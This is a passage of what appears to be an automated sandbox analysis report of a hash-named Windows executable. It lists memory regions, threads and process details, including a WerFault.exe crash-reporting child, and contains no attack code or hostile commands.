"pagefile_0x0000000000650000" filename = "" Region: id = 2309 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2310 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2311 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2312 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2313 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2314 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2315 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2316 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2317 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2318 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2319 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2320 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2321 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2322 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2323 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2324 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2325 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2326 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2327 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2328 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2329 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2330 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2331 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2332 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2333 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Thread: id = 37 os_tid = 0xd54 Thread: id = 38 os_tid = 0x650 Thread: id = 39 os_tid = 0xd10 Process: id = "14" image_name = "f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" page_root = "0x35559000" os_pid = "0x1264" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" " cur_dir = "C:\\Windows\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "15" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x34fe2000" os_pid = "0x1298" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1468 -s 1348" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2345 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2346 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2347 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2348 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2349 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2350 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2351 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2352 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2353 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2354 start_va = 0x8f0000 end_va = 0x932fff monitored = 0 entry_point = 0x910f50 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 2355 start_va = 0x940000 end_va = 0x493ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 2356 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2357 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2358 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2359 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2360 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 2361 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2362 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 2363 start_va = 0x400000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2364 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2365 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2366 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2367 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2368 start_va = 0x5a0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2369 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2370 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2371 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2372 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2373 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2374 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2375 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2376 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2377 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2378 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2379 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2380 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2381 start_va = 0x6c950000 end_va = 0x6c9d6fff monitored = 0 entry_point = 0x6c9bdbc0 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 2382 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2383 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2384 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2385 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2386 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2387 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2388 start_va = 0x6c810000 end_va = 0x6c94efff monitored = 0 entry_point = 0x6c83d880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2389 start_va = 0x72700000 end_va = 0x72721fff monitored = 0 entry_point = 0x727091f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2390 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2391 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2392 start_va = 0x6c7b0000 end_va = 0x6c803fff monitored = 0 entry_point = 0x6c7e10d0 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 2393 start_va = 0x70000000 end_va = 0x70020fff monitored = 0 entry_point = 0x7001a910 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 2394 start_va = 0x480000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2395 start_va = 0x4940000 end_va = 0x4aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 2396 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2397 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2398 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2399 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2400 start_va = 0x4ab0000 end_va = 0x4c37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ab0000" filename = "" Region: id = 2401 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2402 start_va = 0x4c40000 end_va = 0x4dc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c40000" filename = "" Region: id = 2403 start_va = 0x4dd0000 end_va = 0x61cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dd0000" filename = "" Region: id = 2404 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2405 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2406 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2407 start_va = 0x480000 end_va = 0x4cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2408 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2409 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2410 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2411 start_va = 0x5a0000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2412 start_va = 0x6e0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 2413 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 2414 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2415 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2416 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2417 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2418 start_va = 0x61d0000 end_va = 0x69cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000061d0000" filename = "" Region: id = 2419 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2420 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2421 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2422 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2423 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2424 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2425 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2426 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2427 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2428 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2429 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2430 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2431 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2432 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2433 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2434 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2435 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2436 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2437 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2438 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2439 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2440 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2441 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2442 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2443 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2444 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2445 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2446 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2447 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2448 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2449 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2450 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2451 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2452 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2453 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2454 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2455 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2456 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2457 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2458 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2459 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2460 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2461 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2462 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2463 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2464 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2465 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2466 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2467 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2468 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2469 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2470 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2471 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2472 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2473 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2474 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2475 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 